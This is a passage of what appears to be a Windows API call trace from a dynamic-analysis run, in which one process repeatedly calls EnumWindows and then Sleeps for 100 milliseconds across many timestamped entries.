(lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.220] Sleep (dwMilliseconds=0x64) [0130.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.221] Sleep (dwMilliseconds=0x64) [0130.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.223] Sleep (dwMilliseconds=0x64) [0130.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.225] Sleep (dwMilliseconds=0x64) [0130.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.226] Sleep (dwMilliseconds=0x64) [0130.228] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.228] Sleep (dwMilliseconds=0x64) [0130.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.230] Sleep (dwMilliseconds=0x64) [0130.231] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.232] Sleep (dwMilliseconds=0x64) [0130.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.233] Sleep (dwMilliseconds=0x64) [0130.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.235] Sleep (dwMilliseconds=0x64) [0130.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.236] Sleep (dwMilliseconds=0x64) [0130.241] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.241] Sleep (dwMilliseconds=0x64) [0130.242] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.242] Sleep (dwMilliseconds=0x64) [0130.244] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.244] Sleep (dwMilliseconds=0x64) [0130.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.246] Sleep (dwMilliseconds=0x64) [0130.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.247] Sleep (dwMilliseconds=0x64) [0130.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.248] Sleep (dwMilliseconds=0x64) [0130.250] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.250] Sleep (dwMilliseconds=0x64) [0130.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.251] Sleep (dwMilliseconds=0x64) [0130.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.253] Sleep (dwMilliseconds=0x64) [0130.255] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.255] Sleep (dwMilliseconds=0x64) [0130.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.256] Sleep (dwMilliseconds=0x64) [0130.258] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.258] Sleep (dwMilliseconds=0x64) [0130.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.260] Sleep (dwMilliseconds=0x64) [0130.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.261] Sleep (dwMilliseconds=0x64) [0130.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.262] Sleep (dwMilliseconds=0x64) [0130.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.264] Sleep (dwMilliseconds=0x64) [0130.265] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.265] Sleep (dwMilliseconds=0x64) [0130.270] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.270] Sleep (dwMilliseconds=0x64) [0130.272] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.272] Sleep (dwMilliseconds=0x64) [0130.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.273] Sleep (dwMilliseconds=0x64) [0130.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.276] Sleep (dwMilliseconds=0x64) [0130.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.279] Sleep (dwMilliseconds=0x64) [0130.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.281] Sleep (dwMilliseconds=0x64) [0130.284] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.285] Sleep (dwMilliseconds=0x64) [0130.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.286] Sleep (dwMilliseconds=0x64) [0130.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.287] Sleep (dwMilliseconds=0x64) [0130.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.289] Sleep (dwMilliseconds=0x64) [0130.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.291] Sleep (dwMilliseconds=0x64) [0130.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.292] Sleep (dwMilliseconds=0x64) [0130.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.293] Sleep (dwMilliseconds=0x64) [0130.295] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.295] Sleep (dwMilliseconds=0x64) [0130.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.300] Sleep (dwMilliseconds=0x64) [0130.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.302] Sleep (dwMilliseconds=0x64) [0130.303] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.303] Sleep (dwMilliseconds=0x64) [0130.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.304] Sleep (dwMilliseconds=0x64) [0130.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.306] Sleep (dwMilliseconds=0x64) [0130.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.307] Sleep (dwMilliseconds=0x64) [0130.309] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.309] Sleep (dwMilliseconds=0x64) [0130.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.310] Sleep (dwMilliseconds=0x64) [0130.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.312] Sleep (dwMilliseconds=0x64) [0130.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.313] Sleep (dwMilliseconds=0x64) [0130.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.315] Sleep (dwMilliseconds=0x64) [0130.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.317] Sleep (dwMilliseconds=0x64) [0130.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.319] Sleep (dwMilliseconds=0x64) [0130.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.321] Sleep (dwMilliseconds=0x64) [0130.322] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.322] Sleep (dwMilliseconds=0x64) [0130.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.323] Sleep (dwMilliseconds=0x64) [0130.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.325] Sleep (dwMilliseconds=0x64) [0130.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.326] Sleep (dwMilliseconds=0x64) [0130.333] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.334] Sleep (dwMilliseconds=0x64) [0130.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.387] Sleep (dwMilliseconds=0x64) [0130.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.389] Sleep (dwMilliseconds=0x64) [0130.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.390] Sleep (dwMilliseconds=0x64) [0130.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.392] Sleep (dwMilliseconds=0x64) [0130.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.395] Sleep (dwMilliseconds=0x64) [0130.397] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.397] Sleep (dwMilliseconds=0x64) [0130.398] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.398] Sleep (dwMilliseconds=0x64) [0130.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.400] Sleep (dwMilliseconds=0x64) [0130.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.402] Sleep (dwMilliseconds=0x64) [0130.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.404] Sleep (dwMilliseconds=0x64) [0130.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.406] Sleep (dwMilliseconds=0x64) [0130.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.408] Sleep (dwMilliseconds=0x64) [0130.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.409] Sleep (dwMilliseconds=0x64) [0130.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.412] Sleep (dwMilliseconds=0x64) [0130.413] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.413] Sleep (dwMilliseconds=0x64) [0130.415] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.415] Sleep (dwMilliseconds=0x64) [0130.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.417] Sleep (dwMilliseconds=0x64) [0130.419] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.419] Sleep (dwMilliseconds=0x64) [0130.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.421] Sleep (dwMilliseconds=0x64) [0130.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.423] Sleep (dwMilliseconds=0x64) [0130.424] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.424] Sleep (dwMilliseconds=0x64) [0130.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.426] Sleep (dwMilliseconds=0x64) [0130.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.430] Sleep (dwMilliseconds=0x64) [0130.431] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.431] Sleep (dwMilliseconds=0x64) [0130.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.433] Sleep (dwMilliseconds=0x64) [0130.434] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.434] Sleep (dwMilliseconds=0x64) [0130.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.436] Sleep (dwMilliseconds=0x64) [0130.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.437] Sleep (dwMilliseconds=0x64) [0130.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.439] Sleep (dwMilliseconds=0x64) [0130.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.440] Sleep (dwMilliseconds=0x64) [0130.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.442] Sleep (dwMilliseconds=0x64) [0130.443] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.443] Sleep (dwMilliseconds=0x64) [0130.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.445] Sleep (dwMilliseconds=0x64) [0130.446] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.446] Sleep (dwMilliseconds=0x64) [0130.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.448] Sleep (dwMilliseconds=0x64) [0130.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.450] Sleep (dwMilliseconds=0x64) [0130.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.452] Sleep (dwMilliseconds=0x64) [0130.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.453] Sleep (dwMilliseconds=0x64) [0130.456] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.456] Sleep (dwMilliseconds=0x64) [0130.457] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.457] Sleep (dwMilliseconds=0x64) [0130.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.459] Sleep (dwMilliseconds=0x64) [0130.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.461] Sleep (dwMilliseconds=0x64) [0130.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.466] Sleep (dwMilliseconds=0x64) [0130.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.467] Sleep (dwMilliseconds=0x64) [0130.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.469] Sleep (dwMilliseconds=0x64) [0130.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.470] Sleep (dwMilliseconds=0x64) [0130.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.472] Sleep (dwMilliseconds=0x64) [0130.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.473] Sleep (dwMilliseconds=0x64) [0130.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.475] Sleep (dwMilliseconds=0x64) [0130.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.476] Sleep (dwMilliseconds=0x64) [0130.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.478] Sleep (dwMilliseconds=0x64) [0130.479] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.479] Sleep (dwMilliseconds=0x64) [0130.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.481] Sleep (dwMilliseconds=0x64) [0130.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.482] Sleep (dwMilliseconds=0x64) [0130.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.484] Sleep (dwMilliseconds=0x64) [0130.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.485] Sleep (dwMilliseconds=0x64) [0130.487] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.487] Sleep (dwMilliseconds=0x64) [0130.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.488] Sleep (dwMilliseconds=0x64) [0130.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.490] Sleep (dwMilliseconds=0x64) [0130.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.491] Sleep (dwMilliseconds=0x64) [0130.493] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.493] Sleep (dwMilliseconds=0x64) [0130.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.494] Sleep (dwMilliseconds=0x64) [0130.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.496] Sleep (dwMilliseconds=0x64) [0130.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.497] Sleep (dwMilliseconds=0x64) [0130.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.502] Sleep (dwMilliseconds=0x64) [0130.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.504] Sleep (dwMilliseconds=0x64) [0130.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.506] Sleep (dwMilliseconds=0x64) [0130.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.514] Sleep (dwMilliseconds=0x64) [0130.516] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.516] Sleep (dwMilliseconds=0x64) [0130.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.518] Sleep (dwMilliseconds=0x64) [0130.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.520] Sleep (dwMilliseconds=0x64) [0130.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.521] Sleep (dwMilliseconds=0x64) [0130.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.523] Sleep (dwMilliseconds=0x64) [0130.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.524] Sleep (dwMilliseconds=0x64) [0130.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.526] Sleep (dwMilliseconds=0x64) [0130.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.527] Sleep (dwMilliseconds=0x64) [0130.529] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.529] Sleep (dwMilliseconds=0x64) [0130.530] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.530] Sleep (dwMilliseconds=0x64) [0130.532] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.532] Sleep (dwMilliseconds=0x64) [0130.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.534] Sleep (dwMilliseconds=0x64) [0130.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.540] Sleep (dwMilliseconds=0x64) [0130.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.542] Sleep (dwMilliseconds=0x64) [0130.543] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.543] Sleep (dwMilliseconds=0x64) [0130.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.545] Sleep (dwMilliseconds=0x64) [0130.546] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.547] Sleep (dwMilliseconds=0x64) [0130.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.548] Sleep (dwMilliseconds=0x64) [0130.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.550] Sleep (dwMilliseconds=0x64) [0130.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.551] Sleep (dwMilliseconds=0x64) [0130.552] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.553] Sleep (dwMilliseconds=0x64) [0130.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.554] Sleep (dwMilliseconds=0x64) [0130.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.557] Sleep (dwMilliseconds=0x64) [0130.558] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.558] Sleep (dwMilliseconds=0x64) [0130.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.560] Sleep (dwMilliseconds=0x64) [0130.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.561] Sleep (dwMilliseconds=0x64) [0130.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.563] Sleep (dwMilliseconds=0x64) [0130.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.564] Sleep (dwMilliseconds=0x64) [0130.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.566] Sleep (dwMilliseconds=0x64) [0130.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.568] Sleep (dwMilliseconds=0x64) [0130.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.570] Sleep (dwMilliseconds=0x64) [0130.571] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.572] Sleep (dwMilliseconds=0x64) [0130.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.573] Sleep (dwMilliseconds=0x64) [0130.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.575] Sleep (dwMilliseconds=0x64) [0130.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.586] Sleep (dwMilliseconds=0x64) [0130.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.588] Sleep (dwMilliseconds=0x64) [0130.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.590] Sleep (dwMilliseconds=0x64) [0130.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.592] Sleep (dwMilliseconds=0x64) [0130.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.594] Sleep (dwMilliseconds=0x64) [0130.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.595] Sleep (dwMilliseconds=0x64) [0130.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.597] Sleep (dwMilliseconds=0x64) [0130.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.599] Sleep (dwMilliseconds=0x64) [0130.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.601] Sleep (dwMilliseconds=0x64) [0130.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.602] Sleep (dwMilliseconds=0x64) [0130.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.604] Sleep (dwMilliseconds=0x64) [0130.607] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.607] Sleep (dwMilliseconds=0x64) [0130.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.609] Sleep (dwMilliseconds=0x64) [0130.610] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.610] Sleep (dwMilliseconds=0x64) [0130.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.612] Sleep (dwMilliseconds=0x64) [0130.613] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.613] Sleep (dwMilliseconds=0x64) [0130.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.615] Sleep (dwMilliseconds=0x64) [0130.616] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.616] Sleep (dwMilliseconds=0x64) [0130.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.622] Sleep (dwMilliseconds=0x64) [0130.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.623] Sleep (dwMilliseconds=0x64) [0130.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.625] Sleep (dwMilliseconds=0x64) [0130.627] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.627] Sleep (dwMilliseconds=0x64) [0130.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.630] Sleep (dwMilliseconds=0x64) [0130.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.631] Sleep (dwMilliseconds=0x64) [0130.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.633] Sleep (dwMilliseconds=0x64) [0130.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.635] Sleep (dwMilliseconds=0x64) [0130.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.637] Sleep (dwMilliseconds=0x64) [0130.639] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.639] Sleep (dwMilliseconds=0x64) [0130.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.641] Sleep (dwMilliseconds=0x64) [0130.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.642] Sleep (dwMilliseconds=0x64) [0130.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.719] Sleep (dwMilliseconds=0x64) [0130.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.720] Sleep (dwMilliseconds=0x64) [0130.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.722] Sleep (dwMilliseconds=0x64) [0130.724] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.724] Sleep (dwMilliseconds=0x64) [0130.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.726] Sleep (dwMilliseconds=0x64) [0130.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.728] Sleep (dwMilliseconds=0x64) [0130.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.729] Sleep (dwMilliseconds=0x64) [0130.731] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.731] Sleep (dwMilliseconds=0x64) [0130.733] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.733] Sleep (dwMilliseconds=0x64) [0130.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.735] Sleep (dwMilliseconds=0x64) [0130.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.736] Sleep (dwMilliseconds=0x64) [0130.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.738] Sleep (dwMilliseconds=0x64) [0130.739] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.739] Sleep (dwMilliseconds=0x64) [0130.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.741] Sleep (dwMilliseconds=0x64) [0130.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.742] Sleep (dwMilliseconds=0x64) [0130.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.748] Sleep (dwMilliseconds=0x64) [0130.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.750] Sleep (dwMilliseconds=0x64) [0130.751] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.752] Sleep (dwMilliseconds=0x64) [0130.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.753] Sleep (dwMilliseconds=0x64) [0130.754] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.754] Sleep (dwMilliseconds=0x64) [0130.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.756] Sleep (dwMilliseconds=0x64) [0130.757] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.758] Sleep (dwMilliseconds=0x64) [0130.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.759] Sleep (dwMilliseconds=0x64) [0130.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.761] Sleep (dwMilliseconds=0x64) [0130.762] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.762] Sleep (dwMilliseconds=0x64) [0130.763] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.764] Sleep (dwMilliseconds=0x64) [0130.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.765] Sleep (dwMilliseconds=0x64) [0130.766] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.767] Sleep (dwMilliseconds=0x64) [0130.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.768] Sleep (dwMilliseconds=0x64) [0130.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.770] Sleep (dwMilliseconds=0x64) [0130.771] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.771] Sleep (dwMilliseconds=0x64) [0130.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.773] Sleep (dwMilliseconds=0x64) [0130.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.774] Sleep (dwMilliseconds=0x64) [0130.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.776] Sleep (dwMilliseconds=0x64) [0130.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.777] Sleep (dwMilliseconds=0x64) [0130.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.779] Sleep (dwMilliseconds=0x64) [0130.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.781] Sleep (dwMilliseconds=0x64) [0130.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.782] Sleep (dwMilliseconds=0x64) [0130.784] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.784] Sleep (dwMilliseconds=0x64) [0130.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.786] Sleep (dwMilliseconds=0x64) [0130.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.797] Sleep (dwMilliseconds=0x64) [0130.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.799] Sleep (dwMilliseconds=0x64) [0130.801] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.801] Sleep (dwMilliseconds=0x64) [0130.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.803] Sleep (dwMilliseconds=0x64) [0130.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.804] Sleep (dwMilliseconds=0x64) [0130.805] EnumWindows 